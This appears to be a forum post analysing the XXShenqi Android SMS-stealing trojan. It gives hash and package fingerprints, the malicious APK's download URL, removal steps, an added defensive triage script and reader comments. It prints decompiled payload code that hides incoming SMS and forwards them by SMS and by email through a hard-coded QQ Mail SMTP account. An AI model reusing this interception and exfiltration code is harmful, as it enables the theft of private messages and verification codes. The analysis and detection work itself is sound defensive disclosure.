Correction: the title and body of this post previously wrote XXShenqi as XXZhushou. That was a slip on the author's part, who had another app in mind. 233
Virus fingerprint
Dropper package name: com.example.xxshenqi
Dropper MD5: 5956c29ce2e17f49a71ac8526dd9cde3
Payload package name: com.example.com.android.trogoogle
Payload MD5: b0dea6906329c47edbecd48adc15a996
If you receive a text message from a friend reading "XX, look at this, http://cdn.yyupload.com/down/4279193/XXshenqi.apk", do not open it under any circumstances: it is a mobile virus that steals the user's information.
At the time of writing, none of the mainstream mobile security products detect or remove this virus, so it is effectively a 0-day outbreak. Security software with permission management can block the SMS sending, but not the email sending (unless the app is denied network access altogether).
In fact it is a very amateurish piece of malware, on the level of the VB script kiddies of the PC era.
Virus behaviour
Reverse engineering shows the virus does the following:
- After the dropper (XX神器) is installed, it prompts the user to install a "resource pack", which is the actual virus payload
- The payload registers receivers for the boot-completed and incoming-SMS broadcasts (android.permission.RECEIVE_BOOT_COMPLETED and android.permission.RECEIVE_SMS) so that it starts itself automatically
- The payload receives SMS from the phone number 18670259904
- When the payload receives an SMS, it automatically forwards it by SMS to a phone number and by email to [email protected]; the key code is as follows
```java
// Decompiled fragment of the payload's SMS BroadcastReceiver, indented and annotated.
// The decompiler's for(;;)/break/continue output has been folded back into the
// if/else it represents. str2 is presumably the SMS body and str3 the sender
// address; both are assigned in the omitted code above.
//.....
abortBroadcast(); // swallow the broadcast so the user's SMS app never shows the message
System.out.println("木馬收到非命令短訊。發送到控端==============================");
SmsManager localSmsManager = SmsManager.getDefault();
String str4;
if (str3.length() != 11) {
    // Sender is not an 11-digit mobile number: treated as a Taobao-style service
    // message (verification codes etc.) and forwarded to the controller's number.
    System.out.println("木馬覺得淘寶信息==============================");
    str4 = "【特殊消息】" + str2;
    if (str4.length() > 60) {
        // Long messages are split into two SMS to the hard-coded controller number
        localSmsManager.sendTextMessage("18163657397", null, str4.substring(0, str4.length() / 2), null, null);
        localSmsManager.sendTextMessage("18163657397", null, str4.substring(1 + str4.length() / 2), null, null);
    } else {
        localSmsManager.sendTextMessage("18163657397", null, str4, null, null);
    }
} else {
    // Ordinary person-to-person SMS; the rest of this branch was not recovered
    System.out.println("木馬覺得是普通信息==============================");
}
// Wait one second, then kill the own process to leave nothing visible running
new Thread() {
    public void run() {
        System.out.println("木馬Sleep(1000)==============================");
        try {
            Thread.sleep(1000L);
            System.out.println("木馬killProcess================\t");
            Process.killProcess(Process.myPid());
        } catch (InterruptedException localInterruptedException) {
            localInterruptedException.printStackTrace();
        }
    }
}.start();
//.....
```
```java
// Decompiled onHandleIntent() of the payload's MySendEmailService (an IntentService),
// indented and annotated. The SMS text to exfiltrate arrives in the Intent extra "String".
// MailSenderInfo and SimpleMailSender are the malware's own JavaMail wrapper classes.
protected void onHandleIntent(Intent paramIntent) {
    System.out.println("木馬進入MySendEmailService==============================");
    String str = paramIntent.getStringExtra("String");
    System.out.println("木馬開始發送郵件============================");
    MailSenderInfo localMailSenderInfo = new MailSenderInfo();
    localMailSenderInfo.setMailServerHost("smtp.qq.com"); // exfiltration via QQ Mail's SMTP server
    localMailSenderInfo.setMailServerPort("25");          // plain SMTP on port 25
    localMailSenderInfo.setValidate(true);                // SMTP authentication enabled
    localMailSenderInfo.setPassword("lishulili.");        // hard-coded mailbox password
    localMailSenderInfo.setSubject("信息");
    localMailSenderInfo.setContent(str);                  // the stolen SMS becomes the mail body
    new SimpleMailSender().sendTextMail(localMailSenderInfo);
    SimpleMailSender.sendHtmlMail(localMailSenderInfo);   // the same content is sent a second time as HTML
    System.out.println("木馬完成發送郵件=============================");
    System.out.println("木馬離開MySendEmailService=============================");
    System.out.println("木馬killProcess==============================");
    Process.killProcess(Process.myPid());                 // kill the own process once the mail is out
}
```
Removal
Go to Settings -> Apps and uninstall the apps named XX神器 and com.android.Trogoogle
Change the passwords of all your accounts as soon as possible
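As an added triage example (not the post author's code, and not the malware's own code), the Python script below turns three parts of the post into offline checks: the MD5 and package-name fingerprints from the "Virus fingerprint" section, the behaviour list (a high-priority receiver for incoming SMS, a boot receiver, and SMS plus network send permissions), and the removal step (a filter over the output of `adb shell pm list packages`). The manifest and the package list are constructed for the example; the receiver class names in the manifest are invented. The broadcast actions android.provider.Telephony.SMS_RECEIVED and android.intent.action.BOOT_COMPLETED are the standard Android actions behind the two permissions listed above, and the priority check rests on how abortBroadcast() in the decompiled receiver works: on Android before 4.4 SMS_RECEIVED is an ordered broadcast, so only a receiver registered with a higher priority than the default SMS app can swallow the message.

```python
"""Offline triage for the XXShenqi sample: IoC matching, a manifest heuristic for the
SMS-intercept / auto-start pattern, and a filter over `adb shell pm list packages`.
Added example; not the post author's code."""
import hashlib
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"  # key prefix for android:* attributes

# Fingerprints as quoted in the post (MD5 -> (role, package name)).
KNOWN_SAMPLES = {
    "5956c29ce2e17f49a71ac8526dd9cde3": ("dropper", "com.example.xxshenqi"),
    "b0dea6906329c47edbecd48adc15a996": ("payload", "com.example.com.android.trogoogle"),
}
KNOWN_PACKAGES = {pkg: role for role, pkg in KNOWN_SAMPLES.values()}

# Standard Android broadcast actions behind the two receivers described in the post.
SMS_ACTION = "android.provider.Telephony.SMS_RECEIVED"
BOOT_ACTION = "android.intent.action.BOOT_COMPLETED"


def md5_hex(data: bytes) -> str:
    """MD5 of an APK's bytes, for comparison with the post's fingerprints."""
    return hashlib.md5(data).hexdigest()


def match_known_sample(md5: str, package: str):
    """Return 'dropper' / 'payload' when the hash or package name matches, else None."""
    role = KNOWN_SAMPLES.get(md5.lower())
    return role[0] if role else KNOWN_PACKAGES.get(package)


def manifest_findings(manifest_xml: str) -> set:
    """Heuristic over a decoded AndroidManifest.xml (e.g. apktool output); returns finding codes."""
    root = ET.fromstring(manifest_xml)
    perms = {p.get(ANDROID + "name") for p in root.iter("uses-permission")}
    found = set()
    if {"android.permission.RECEIVE_SMS", "android.permission.SEND_SMS"} <= perms:
        found.add("sms-forward")      # can read incoming SMS and resend them
    if "android.permission.RECEIVE_BOOT_COMPLETED" in perms:
        found.add("boot-persist")     # may start itself after a reboot
    if "android.permission.INTERNET" in perms:
        found.add("network")          # second exfiltration channel (SMTP in this sample)
    for receiver in root.iter("receiver"):
        for flt in receiver.iter("intent-filter"):
            actions = {a.get(ANDROID + "name") for a in flt.iter("action")}
            priority = int(flt.get(ANDROID + "priority", "0"))
            # A high-priority SMS_RECEIVED receiver is what lets abortBroadcast()
            # hide the message from the default SMS app (ordered broadcast, pre-4.4).
            if SMS_ACTION in actions and priority > 0:
                found.add("sms-intercept")
            if BOOT_ACTION in actions:
                found.add("boot-receiver")
    return found


def looks_like_xxshenqi_payload(findings: set) -> bool:
    """True when the manifest carries the full intercept / forward / persist profile."""
    return {"sms-intercept", "sms-forward", "boot-persist", "boot-receiver"} <= findings


def suspicious_installed(pm_list_output: str) -> list:
    """Filter `adb shell pm list packages` output for the post's package names.
    The '.trogoogle' suffix check also catches the label com.android.Trogoogle."""
    hits = []
    for line in pm_list_output.splitlines():
        pkg = line.strip()
        if pkg.startswith("package:"):
            pkg = pkg[len("package:"):]
        if pkg in KNOWN_PACKAGES or pkg.lower().endswith(".trogoogle"):
            hits.append(pkg)
    return hits


# Constructed manifest for the example: receiver class names are invented, the
# permissions and actions are those the post's analysis implies.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.com.android.trogoogle">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application>
    <receiver android:name=".SmsReceiver">
      <intent-filter android:priority="1000">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

# Constructed `adb shell pm list packages` output with one benign and both malicious packages.
SAMPLE_PM_LIST = """package:com.android.chrome
package:com.example.xxshenqi
package:com.example.com.android.trogoogle
"""
```

For a real device, feed `md5_hex()` the bytes of the downloaded APK and `suspicious_installed()` the actual `adb shell pm list packages` output; the manifest heuristic is deliberately broad (any SMS app with a boot receiver trips part of it), so treat `looks_like_xxshenqi_payload()` as a reason to look closer rather than as a verdict.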
Does the first paragraph count as sophisticated trolling?
As long as you get it [not really
_(:з」∠)_ This "virus" is written rather classily too, huh
_(:з」∠)_